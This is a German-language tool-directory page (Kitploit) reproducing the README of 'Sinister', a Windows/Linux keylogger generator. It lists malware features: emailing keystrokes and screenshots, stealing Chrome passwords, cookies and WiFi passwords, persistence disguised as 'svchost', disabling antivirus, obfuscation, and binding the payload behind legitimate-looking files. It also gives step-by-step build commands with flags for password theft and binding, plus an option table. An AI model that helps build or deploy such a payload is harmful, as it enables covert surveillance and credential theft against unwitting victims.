Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Sinister — Sinister ist ein Windows/Linux-Keylogger-Generator, der Tastenanschläge per E-Mail zusammen mit anderen interessanten Zielinformationen sendet. | Kitploit
Tools/GitHubGitHub/pushpenderindia/sinister
Passwort-CrackingPayload-GenerierungPersistenzmechanismenDatenexfiltrationInformationsbeschaffungPost-ExploitationRed TeamingRemote-Access-Tool
GitHubpushpenderindia/sinister

Sinister

Sinister ist ein Windows/Linux-Keylogger-Generator, der Tastenanschläge per E-Mail zusammen mit anderen interessanten Zielinformationen sendet.

Repository anzeigen
46593vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Sinister Logo

Sinister

Hacker GIF

root@kitploit:~
                    Dieses kleine Python-Skript kann wirklich tolle Arbeit leisten.

Sinister ist ein Keylogger-Generator für Windows/Linux, der Key-Logs und Screenshots per E-Mail sendet, zusammen mit anderen nützlichen Zielinformationen, geschrieben in Python 3.

Haftungsausschluss

:computer: Dieses Projekt wurde nur für gute Zwecke und den persönlichen Gebrauch erstellt.

DIESE SOFTWARE WIRD OHNE JEGLICHE GEWÄHRLEISTUNG BEREITGESTELLT. SIE NUTZEN DIESE SOFTWARE AUF EIGENES RISIKO. DIE NUTZUNG LIEGT IN DER VOLLEN VERANTWORTUNG DES ENDNUTZERS. DIE ENTWICKLER ÜBERNEHMEN KEINE HAFTUNG UND SIND NICHT VERANTWORTLICH FÜR MISSBRAUCH ODER SCHÄDEN, DIE DURCH DIESES PROGRAMM VERURSACHT WERDEN.

Funktionen

  • Funktioniert unter Windows/Linux
  • Benachrichtigt per E-Mail bei neuem Opfer
  • Unauffindbar
  • Persistenz
  • E-Mail-Anmeldedatenvalidierung vor der Payload-Erstellung
  • Kann Keylogs mit jedem E-Mail-Anbieter empfangen, z.B. GMAIL, YAHOO, OUTLOOK, benutzerdefiniertem SMTP.
  • SMTP-Server/Port
ServernameSMTP-ServerSMTP-Port
GMAILsmtp.gmail.com587
OUTLOOKsmtp-mail.outlook.com587
YAHOOsmtp.mail.yahoo.com587
  • Sendet Screenshot des Opfer-PC-Bildschirms per E-Mail
  • Erstellt ausführbare Binärdatei ohne Abhängigkeiten
  • Erstellt kleine Größe ~ 5 MB Payload mit erweiterten Funktionen
  • Verschleiert die Payload vor der Generierung, um einige Antiviren zu umgehen
  • Die generierte Payload ist mit base64 codiert, was das Reverse Engineering extrem erschwert
  • Funktion zum Beenden von Antiviren auf dem Opfer-PC und versucht, die Sicherheit zu deaktivieren
  • Tolle farbenfrohe Oberfläche zur Payload-Erstellung
  • Auf Angreiferseite: Während der Payload-Erstellung erkennt das Skript automatisch fehlende Abhängigkeiten und installiert sie
  • Unterscheidet Log-Daten basierend auf dem aktiven Fensternamen (Siehe Bild für besseres Verständnis)
  • Möglichkeit, benutzerdefiniertes Symbol zur bösen Datei hinzuzufügen
  • Integrierter Binder, der Keylogger an beliebige Dateien [.pdf, .txt, .exe usw.] binden kann – legitime Datei im Vordergrund, böser Code im Hintergrund als Dienst.
  • Prüft auf bereits laufende Instanz auf dem System. Läuft eine Instanz, wird nur die legitime Datei ausgeführt [, um doppelte E-Mail-Protokolle zu vermeiden].
Der integrierte Stealer kann diese Dinge stehlen:
Chrome-Browser (gespeicherte Passwörter)
WiFi (gespeicherte Passwörter)
Chrome-Cookies (Login-Daten, Cookies, Verlauf)
Firefox-Cookies (cookies.sqlite)

Hinweis: Der benutzerdefinierte Stealer ist codiert, basiert nicht auf LaZagne

  • Erfasst und sendet nützliche Informationen des Opfergeräts
Diese Dinge werden erfasst und gesendet:
Betriebssystem
Computername
Benutzername
Öffentliche IPv4
  • Wenn Ihre Payload nicht ausgeführt werden kann, geben Sie --debug an, um die EXE im Vordergrund mit CMD auszuführen

Wichtig

Am 30. Mai 2022 hat Google die Funktion für weniger sichere Apps entfernt. Verwenden Sie daher statt des Gmail-Passworts:

  • Aktivieren Sie 2FA auf Ihrem Angreifer-Gmail
  • Erstellen Sie ein anwendungsspezifisches Passwort
  • Verwenden Sie dieses anwendungsspezifische Passwort beim Erstellen der Payload.
  • So erstellen Sie ein anwendungsspezifisches Passwort: Hier klicken

Getestet auf

Kali) Kali Linux – ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 – Pro

Windows) Windows 7 – Ultimate

Voraussetzungen

  • Python 3.X
  • Einige externe Module

Verwendung unter Linux

root@kitploit:~
# Navigieren Sie zum /opt-Verzeichnis (optional)
$ cd /opt/

# Klonen Sie dieses Repository
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Navigieren Sie zum Sinister-Ordner
$ cd Sinister

# Abhängigkeiten installieren
$ bash installer_linux.sh

*** Hinweis: Wenn während der Ausführung von installer_linux.sh das Python-Installationsdialogfeld erscheint ***
    * Klicken Sie auf "Benutzerdefinierte Installation"
    * Wählen Sie Pfad zu: C:/Python37-32
    ### Damit Python in diesem Pfad installiert wird (in Wine): ~/.wine/drive_c/Python37-32

# Falls Sie Fehler bei der Ausführung von installer_linux.sh erhalten, versuchen Sie die Installation mit installer_linux.py
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# Payload/RAT erstellen
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Payload mit GMAIL SMTP-Server, Port-Konfiguration (Standards: SMTP-Server = smtp.gmail.com, SMTP-Port = 587)
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Payload mit OUTLOOK SMTP-Server, Port-Konfiguration
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path

# Payload mit YAHOO SMTP-Server, Port-Konfiguration
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path

Hinweis: Sie können auch unsere benutzerdefinierten Icons aus dem icon-Ordner verwenden, z.B. --icon icon/pdf.ico

Verwendung unter Windows

root@kitploit:~
# Abhängigkeiten installieren
$ Installieren Sie die neueste Python 3.x

# Klonen Sie dieses Repository
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Wechseln Sie in das Repository
$ cd Sinister

# Abhängigkeiten installieren
$ python -m pip install -r requirements.txt

# Öffnen Sie Sinister.py in einem Texteditor und konfigurieren Sie Zeile 16: WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe"

# Hilfemenü anzeigen
$ python Sinister.py --help

# Payload/RAT erstellen
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# Payload mit GMAIL SMTP-Server, Port-Konfiguration (Standards: SMTP-Server = smtp.gmail.com, SMTP-Port = 587)
$ python Sinister.py -e [email protected] -p YourEmailPass-w -o output_file_name --icon icon_path

# Payload mit OUTLOOK SMTP-Server, Port-Konfiguration
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -w -o output_file_name --icon icon_path

# Payload mit YAHOO SMTP-Server, Port-Konfiguration
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -w -o output_file_name --icon icon_path

Hinweis: Sie können auch unsere benutzerdefinierten Icons aus dem icon-Ordner verwenden, z.B. --icon icon/pdf.ico

Aktualisieren

  • Führen Sie updater.py aus, um automatisch zu aktualisieren, oder laden Sie das neueste ZIP aus diesem GitHub-Repo herunter.
  • Hinweis: Git muss installiert sein, um updater.py verwenden zu können.

Hinweis:- Die böse Datei wird im Ordner dist/ im Sinister/-Ordner gespeichert.

Verfügbare Argumente

  • Optionale Argumente

Hinweis: Entweder -w/--windows oder -l/--linux muss angegeben werden.

  • Erforderliche Argumente

Neue Screenshots:

Hilfe anzeigen

Payload generieren

Bericht erhalten

Log-Daten werden basierend auf dem aktiven Fensternamen unterschieden ~ Funktion hinzugefügt in v1.3 und später

Ruft gespeicherte Chrome-Browser-Passwörter ab und sendet sie

  • Hinweis: Um diese Funktion zu nutzen, geben Sie -s oder --steal-password beim Erstellen des Keyloggers an.

Ruft gespeicherte WLAN-Passwörter ab und sendet sie

  • Hinweis: Um diese Funktion zu nutzen, geben Sie -s oder --steal-password beim Erstellen des Keyloggers an.

Siehe auch diese alten Bilder

~Alte Screenshots:

Hilfe anzeigen

Sinister.py-Skript ausführen

Erstellung abgeschlossen

Wenn der Keylogger läuft, fügt er einen Registrierungseintrag für Persistenz hinzu

Erstellt eine Kopie von sich selbst und speichert sie im Roaming-Ordner

Zufälligen Text eingeben, um Keylogger zu testen

Bericht 1, gesendet von Sinister

Facebook-Login ~ Opfer

Bericht 2 – Keylogs der Facebook-Anmeldedaten

Bericht 3 – Mit Screenshots

Debugging von Problemen

Versuchen Sie, den Offline-Keylogger auszuführen, um das Offline-Keylogging zu testen und Keylogger-Probleme zu debuggen, indem Sie diese Befehle ausführen:

Führen Sie test_key.py in beiden Modi [Kompiliert & Roh] aus und finden Sie den Fehler heraus.

Führen Sie es so aus: python test_key.py

Kompilieren Sie es auch so: pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

Nach dem Ausführen beginnen Sie mit der Eingabe von etwas, Das Ergebnis wird nach jeweils 10 Sekunden auf der Kommandozeile angezeigt.

Die Dateien des Offline-Keyloggers befinden sich im Ordner TestKeylogger

  • Falls die Payload auf dem Opfer-System nicht ausgeführt werden kann:
root@kitploit:~
1. Erstellen Sie eine neue Payload mit dem Flag --debug
2. Führen Sie die Payload-EXE über die Eingabeaufforderung aus [Nicht durch Doppelklick ausführen]
3. Es wird nun ein besserer Fehler in CMD angezeigt. Posten Sie das Problem im Issue-Bereich.

Sinister unter Windows entfernen:

Methode 1:

  • Gehen Sie zu Start, geben Sie regedit ein und starten Sie das erste Programm. Dadurch wird der Registrierungseditor geöffnet.
  • Navigieren Sie zu folgendem Pfad: Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Dort sollte ein Eintrag namens "svchost" sein. Klicken Sie mit der rechten Maustaste darauf und wählen Sie "Löschen".
  • Gehen Sie zu Ihrem Benutzerpfad > AppData > Roaming, dort sehen Sie eine Datei namens "svchost.exe" – das ist der RAT. Rechtsklick > Löschen.
  • Starten Sie das System neu.

Methode 2:

  • Führen Sie "RemoveSinister.bat" auf dem infizierten System aus und starten Sie dann den PC neu, um die aktuell laufende böse Datei zu stoppen.

Sinister unter Linux entfernen:

  • Öffnen Sie die Autostart-Datei mit einem Texteditor. Autostart-Dateipfad: ~/.config/autostart/xinput.desktop

  • Entfernen Sie diese 5 Zeilen:

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • Hinweis: destination_file_name ist der Name der bösen Datei, den Sie Ihrem Keylogger mit dem Parameter -o gegeben haben.

  • Starten Sie Ihr System neu und löschen Sie dann die böse Datei, die unter diesem Pfad gespeichert ist:

  • Zielpfad, wo der Keylogger gespeichert ist: ~/.config/xnput

Beitragende

  • Liste der engagierten Beitragenden: Contributors

Beiträge jeder Art sind willkommen!

HINWEIS: Sollten Sie auf der Liste der Beitragenden stehen, aber wir haben Sie vergessen, dann lassen Sie es uns bitte wissen!

TODO

  • Eigene Funktion vorschlagen
  • Neue Funktionen hinzufügen
  • GUI-Version beisteuern
Tool herunterladen
Mehrfachinstanz-Sperre
  • Angreifer kann Payload für Windows/Linux-Betriebssysteme mit einem Linux-System erstellen/kompilieren, aber mit einem Windows-Rechner nur Windows-Ausführbare Dateien erstellen/kompilieren
  • Ruft gespeicherte Passwörter vom Opfer-System ab und sendet sie an den Angreifer.
  • KurzformVollständige FormBeschreibung
    -h--helpZeigt diese Hilfemeldung an und beendet das Programm
    -i INTERVAL--interval INTERVALZeit zwischen Berichten in Sekunden. Standard=120
    -t TIME_PERSISTENT--persistence TIME_PERSISTENTPersistenz nach __ Sekunden herstellen. Standard=10
    -x SMTP_Server--smtpBenutzerdefinierter SMTP-Server. Standard="smtp.gmail.com"
    -y SMTP_Port--portBenutzerdefinierter SMTP-Port. Standard=587
    -w--windowsErzeuge eine Windows-Ausführbare Datei.
    -l--linuxErzeuge eine Linux-Ausführbare Datei.
    -s--steal-passwordGespeicherte Passwörter vom Opferrechner stehlen [Unterstütztes BS: Windows]
    -b datei.txt--bind LEGITIMATE_FILE_PATH.pdfAutoBinder: Pfad einer legitimen Datei angeben. [Unterstütztes BS: Windows]
    -d--debugPayload wird im Vordergrund mit CMD-Fenster ausgeführt, um geeignete Ausführungsfehler zu erhalten
    KurzformVollständige FormBeschreibung
    --icon ICONIcon-Pfad angeben, Icon der bösen Datei [Hinweis: Muss .ico sein]
    -e EMAIL--email EMAILE-Mail-Adresse, an die Berichte gesendet werden.
    -p PASSWORD--password PASSWORDPasswort für die im Argument -e angegebene E-Mail-Adresse.
    -o OUT--out OUTName der Ausgabedatei.

    Pushpender Singh

    :computer:

    Thomas Kunwar

    :computer:

    krasnova19

    :computer:

    sarchish5

    :computer:

    chiragcode11

    :computer:

    C4RR0T02

    :computer: